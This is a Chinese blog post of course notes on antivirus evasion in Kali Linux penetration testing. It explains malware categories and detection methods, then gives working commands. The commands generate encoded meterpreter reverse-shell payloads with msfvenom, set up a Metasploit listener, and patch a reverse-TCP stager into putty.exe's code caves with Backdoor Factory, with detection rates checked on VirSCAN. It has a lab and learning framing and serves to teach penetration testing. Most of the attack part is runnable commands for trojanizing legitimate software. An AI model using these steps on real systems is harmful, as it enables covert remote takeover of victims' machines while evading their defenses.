Kali Linux渗透测试——免杀基础

最新推荐文章于 2024-05-29 22:21:42 发布
最新推荐文章于 2024-05-29 22:21:42 发布
阅读量2.1k 收藏 32
点赞数 1
分类专栏: Kali Linux渗透测试 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Captain_RB/article/details/106335062
版权

笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程

文章目录

一、基础概念

(一)恶意软件

在用户非自愿情况下执行安装,具有控制、窃取、勒索、攻击等恶意功能的软件,基本分类如下:

  • 病毒:独立存在或者插入在计算机程序中的恶意代码,可通过隐蔽复制进行传播
  • 蠕虫:可以通过网络进行传播病毒
  • 木马:通过伪装诱使用户运行程序,达到远程控制、破坏系统等目的,一般不会通过复制传播,不会感染其他文件RAT(Remote Access Trojan)即远程访问木马
  • 键盘记录:自动记录键盘键入内容
  • 僵尸程序:利用感染主机作为僵尸机,在未授权情况下对第三方发起攻击或完成恶意操作
  • 流氓软件:跟踪上网行为,完成广告弹窗、浏览器劫持、泄漏隐私信息等非授权操作
  • 勒索软件:限制系统文件资源访问,直至向攻击者做出妥协
  • 广告程序:插入未经授权的广告,赚取黑色利润

随着技术发展其分类边界愈加模糊,恶意软件常具备以上多种特点。常见RAT软件包括:灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore等。

(二)防护手段

恶意软件最主要的防护手段包括杀毒/防毒软件、防火墙、IPS、IDS等产品,这些产品都具有AV(Anti-Virus)功能,其检测原理大致分为三类:

  • 静态检测:基于二进制文件中特征字符的黑名单检测方法,包括检测恶意软件本身的特征字符,以及加密工具的特征字符,优点是快速方便,对已知的特征字符查找准确率较高,缺点是容易被0day木马和新型加密绕过。

  • 动态检测:基于木马程序执行时的特征行为进行检测,可以弥补静态检测不能查出0day木马和新型加密的缺陷,但该技术尚未成熟,存在误杀漏杀情况。

  • 日志检测:基于大量日志文件分析并建立模型来检测出异常文件,优点是当日志分析量较大时准确性较高,缺点是当日志量较小时难以建立正确模型,存在误杀漏杀情况,而且分析巨量日志文件使得处理能力和效率较低。

(三)免杀技术

攻击者可以通过转换恶意软件的方法绕过安全防护机制,基本方法如下:

  • 绕过二进制文件的特征字符检测:在已有代码基础上替换、擦除、篡改,或者编写新的恶意代码
  • 加密:使得二进制文件的特征字符不可读,可以在运行时分片分段解密执行,注入进程或AV不检查的白名单文件中
  • 内存运行:将恶意代码置于内存运行,以绕过一些基于文件系统进行检测的AV程序

注意:由于AV不仅检查恶意软件本身的特征字符,还会检查加密工具的特征字符,所以恶意软件在经过一些 知名加密工具 加密后,可能导致被AV检测出的可能性会更大。编写私有恶意软件,或使用独有加密工具可以实现更好的免杀功能。

单一AV厂商的病毒库很难达到100%全覆盖,一些网站集成多种AV检测引擎,提供更好的病毒检测功能,甚至某些AV软件没有自己的病毒库,直接调用这些网站提供的接口:

二、工具介绍

(一)Msfvenom

基于Metasploit的木马脚本生成工具,基本使用方法如下:

# 首先生成木马脚本
msfvenom --platform linux -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.11.129 LPORT=4444 -b "0" -e x86/shikata -i 9 -f elf -o file.bin
# -p:选择payload
# -e:编码方式
# -b:去掉坏字符
# -i:迭代编码次数
# -f:生成文件格式
# -o:生成文件名称
# LHOST、LPORT:payload运行后要回连的主机和端口,也是本机要侦听的端口

# 然后运行msfconsole,在本机开启侦听端口
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp 
set LHOST 10.10.11.129
set LPORT 4444
run

# 最后上传木马脚本并在靶机运行,取得回连shell,获取控制权

可以在已有模板插入恶意代码,不破坏原程序的功能和使用,每次运行都被重新激活运行:

msfvenom -a x64 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.11.151 LPORT=4444 -b "\x00" -f exe -o 1.exe
# -x和-k参数一般同时使用
# -x:表示与现有软件绑定在一起
# -k:表示在现有程序基础上另开一个线程运行,这样才不会覆盖原程序

注意:类似Msfvenom这种知名木马脚本生成工具,其处理文件的特征字符串已被绝大多数AV软件收录,所以查杀率很高,实际应用中免杀效果并不理想。

(二)Veil-evasion

1.基本介绍

属于Veil-framework框架的一部分,由Python语言编写,用于将已有payload做加密、编码等变换,从而实现免杀,具有以下特点:

  • 集成msf payload,常配合Metasploit使用
  • 集成多种进程注入技术
  • 集成多种第三方工具如:Hypersion、PEScrambler、BackDoor Factory等
  • 集成多种开发打包运行环境如:Python、C#、C等
2.使用方法

通过veil-evasion命令运行,根据菜单向导配置payload,然后generate生成payload,如下图所示:

Veil-Evasion运行界面

图1 Veil-Evasion运行界面

默认生成的payload保存在/var/lib/veil-evasion/output/compiled/目录下,配合其使用的服务端命令以rc脚本文件的形式保存在/var/lib/veil-evasion/output/handlers/目录中,用于结合Metasploit使用,可以通过msfconsole -r payload.rc命令调用脚本文件。

(三)Backdoor-factory

1.基本介绍

由python语言开发的后门工具,适用于制作或绑定Windows PE和Linux ELF木马脚本文件。BDF可将shellcode代码patch进模板程序,躲避AV查杀,可以不破坏模板程序的功能和使用,每次运行文件shellcode都被重新激活运行,类似Metasploit,但存在一定区别如下:

  • Metasploit:在原有二进制文件的基础上,增加完整shellcode片段,跳转执行。
  • BDF:将shellcode划分不同大小代码块,放置于模板文件的代码缝隙中,shellcode在不同的代码缝隙跳转执行。代码缝隙指二进制文件中超过两个字节的连续0x00区域(代码片段间区域),代码缝隙是由编译器形成的,不同编译器对同一源文件编译的结果不同。

注意:存在一定概率文件会被patch坏掉,某些受保护的二进制程序也无法进行patch。

2.使用方法

模板文件以putty.exe为例,注意这里有个坑,用在kali中用apt install下载的backdoor-factory不能识别可执行文件,提示putty.exe not a PE File,我们需要在GitHub自行下载,并安装capstone包:

git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.py
pip3 install capstone

./backdoor.py -f ~/Desktop/putty.exe -S
# 检查putty.exe是否支持代码注入

./backdoor.py -f ~/Desktop/putty.exe -s show
# 显示可插入putty.exe的payload

./backdoor.py -f ~/Desktop/putty.exe -c 
# 查看putty.exe的代码缝隙

将payload作为整个section添加到文件末尾成功率高,但是免杀效果差;将payload划分为多个section添加到文件代码缝隙中成功率低,但是免杀效果好。

./backdoor.py -f ~/Desktop/putty.exe -s reverse_tcp_stager_threaded -H 10.10.11.129 -P 4444
# 默认命令将payload作为整个section插入到文件一个代码缝隙中

./backdoor.py -f ~/Desktop/putty.exe -s reverse_tcp_stager_threaded -H 10.10.11.129 -P 4444 -J
# -J:将payload划分为多个section添加到文件代码缝隙中

./backdoor.py -f ~/Desktop/putty.exe -s reverse_tcp_stager_threaded -H 10.10.11.129 -P 4444 -a 
# -a:将payload作为整个section添加到文件末尾

payload插入后将putty.exe保存在backdoored目录下,将其上传至目标靶机,结合Metasploit使用:

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
# 注意payload要选择x64平台meterpreter,否则可能运行失败
set LHOST 10.10.11.129
set LPORT 4444
run -j

最后在靶机中运行putty.exe,取得shell控制权。将运用-a参数生成的putty.exe传到VirSCAN检测,效果还是可以的,检测结果如下图所示:
VirSCAN检测结果

图2 VirSCAN检测结果

Captain_RB
关注
  • 1
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali linux 源码免杀,shellcode超级免杀
weixin_35718351的博客
05-12 1646
shellcode超级免杀作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.日期: 2019-12-31我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2) 从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写...
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5671
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
简单的Msf木马免杀
weixin_47948655的博客
08-12 1104
简单加密shellcode与加载器实现msf木马免杀
kali制作木马并使用shellter免杀工具来实现更低的查杀率
最新发布
勤能补拙
05-29 784
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀
Kali生成windows木马程序
qq_51950323的博客
09-07 9675
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
Kail Linux渗透测试教程之免杀Payload生成工具Veil
09-01 498
Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具——Veil Kail Linux渗透测试教程之免杀Payload生成工具VeilVeil是一款利用...
kali Linux渗透基础知识.pdf
01-25
本文将详细介绍Kali Linux渗透基础知识中的关键环节——信息收集。 信息收集是渗透测试的第一步,它涉及对目标系统进行情报分析、扫描探测、服务查点和漏洞搜索,甚至利用社会工程学技巧获取信息。这一过程旨在了解...
kali linux web渗透课程
02-21
51CTO课程,玄魂主讲,kali linux web 渗透测试——初级教程
安卓——Kali_linux操作文档.docx
08-20
在安卓设备上运行Kali Linux是一种有趣且实用的技术实践,这使得安全研究人员和爱好者能够在移动设备上进行渗透测试和网络安全分析。本指南将详细解释如何在安卓手机上安装并配置Kali Linux。 首先,你需要下载两个...
利用“Kali Linux”与“Docker”技术进行渗透测试实验.pdf
09-06
"利用“Kali Linux”与“Docker”技术进行渗透测试实验" 本文主要介绍了利用“Kali Linux”与“Docker”技术进行渗透测试实验的方法和技术。渗透测试是网络安全中的一种重要手段,通过模拟黑客的攻击方法、技术来...
kali免杀工具Veil Evasion
scholar_1的博客
07-04 3052
首先,介绍一下Veil Evasion,Veil Evasion是linux的一款免杀工具,是一个用 Python 编写的免杀框架,用来生成MSF的Payload,能绕过常见的杀毒软件,它可以将任意脚本或一段 Shellcode 转换成 Windows 可执行文件,从而逃避常见防病毒产品的检测。关于MSF,它就是一个漏洞框架(全称:The Metasploit Framework),嗯,免费,通过这个框架,我们可以很容易的对于软件的漏洞进行攻击。它本身带有几千个漏洞攻击工具。......
Veil-Evasion-master.zip
04-03
Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过大部分的杀软。从github.com上下实在太慢了,就低积分安利一下。
Kali Linux渗透测试进阶提升及其实战教程
11-07
一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要      本课程主要分享Kali Linux渗透测试进阶实战技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
Kali-linux免杀Payload生成工具Veil
2301_77162959的博客
05-18 965
Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用。
免杀测试】Kali之Metasploit几款工具免杀练习
小司机的奥拓
12-25 1410
余磊不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil, Avet01shellterShellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。它是生成一个dll文件再将其注入到任意一个文件中运行。
上传文件绕过姿势
mozhe_的博客
05-04 656
限制上传文件扩展名WebShell文件上传漏洞分析溯源(第1题)https://www.mozhe.cn/bug/detail/UjV1cnhrbUxVdmw5VitBdmRyemNDZz09bW96aGUmozhe了解PHP及PHP5各个版本的相关知识;了解PHP上传绕过扩展名的方法;了解Burpsuite的使用方法。js限制上传文件格式WebShel...
kaliveil-evasion免杀安装找不到wine32包-亲测解决方案
跃祥博客
12-27 2836
该软件需要wine32包,一般在64位kali里是只有wine64包 所以需要更新架构 dpkg --add-architecture i386 apt-get update 之后就可以安装veil时就可以安装wine32了。 安装veil-evasion: apt-get install veil-evasion ...
kali渗透测试环境搭建
09-08
要搭建Kali Linux渗透测试环境,你可以使用虚拟化技术,在电脑中模拟一个计算机环境来进行渗透测试。这样做的好处是可以放心地进行测试,而不用担心法律问题。你可以使用VMware Workstation软件搭建Kali Linux作为渗透测试实验平台,同时搭建Metasploitable作为渗透测试目标。具体操作可以分为三个步骤: 1. 虚拟机的搭建:使用VMware Workstation软件创建一个新的虚拟机,根据向导选择相应的操作系统和配置。你可以选择Kali Linux作为虚拟机的操作系统。 2. Kali Linux系统的安装:在虚拟机中安装Kali Linux操作系统。你可以下载Kali Linux的ISO安装文件,然后将其加载到虚拟机中,并按照安装向导进行安装。 3. Metasploitable环境的搭建:安装完Kali Linux后,你可以在虚拟机中下载和安装Metasploitable。然后,你可以使用Kali Linux中的默认浏览器(如IceWeasel)访问Metasploitable虚拟机的地址,以验证连接是否成功。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [kali渗透技术实战——搭建渗透测试环境](https://blog.csdn.net/weixin_54787877/article/details/113922900)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值